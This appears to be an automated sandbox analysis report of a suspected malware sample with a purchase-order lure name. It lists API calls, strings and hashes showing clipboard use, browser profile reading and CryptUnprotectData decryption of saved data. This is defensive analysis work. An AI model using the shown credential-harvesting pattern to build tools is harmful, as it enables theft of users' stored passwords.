                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                • String ID:
                                                                                • API String ID: 1213725291-0
                                                                                • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                • free.MSVCRT ref: 00418370
                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                • String ID: OsError 0x%x (%u)
                                                                                • API String ID: 2360000266-2664311388
                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                APIs
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                • String ID:
                                                                                • API String ID: 2633007058-0
                                                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1865533344-0
                                                                                • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                APIs
                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                APIs
                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                • memset.MSVCRT ref: 0040265F
                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                • API String ID: 2929817778-1134094380
                                                                                • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                • API String ID: 2787044678-1921111777
                                                                                • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                • GetDC.USER32 ref: 004140E3
                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 2080319088-3046471546
                                                                                • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                APIs
                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                • memset.MSVCRT ref: 00413292
                                                                                • memset.MSVCRT ref: 004132B4
                                                                                • memset.MSVCRT ref: 004132CD
                                                                                • memset.MSVCRT ref: 004132E1
                                                                                • memset.MSVCRT ref: 004132FB
                                                                                • memset.MSVCRT ref: 00413310
                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                • memset.MSVCRT ref: 004133C0
                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                Strings
                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                • {Unknown}, xrefs: 004132A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                • API String ID: 4111938811-1819279800
                                                                                • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                • String ID:
                                                                                • API String ID: 829165378-0
                                                                                • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                • memset.MSVCRT ref: 00404200
                                                                                • memset.MSVCRT ref: 00404215
                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 0040426E
                                                                                • memset.MSVCRT ref: 004042CD
                                                                                • memset.MSVCRT ref: 004042E2
                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                • API String ID: 2454223109-1580313836
                                                                                • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+v@Fv@Bv
                                                                                • API String ID: 667068680-1085305157
                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                APIs
                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
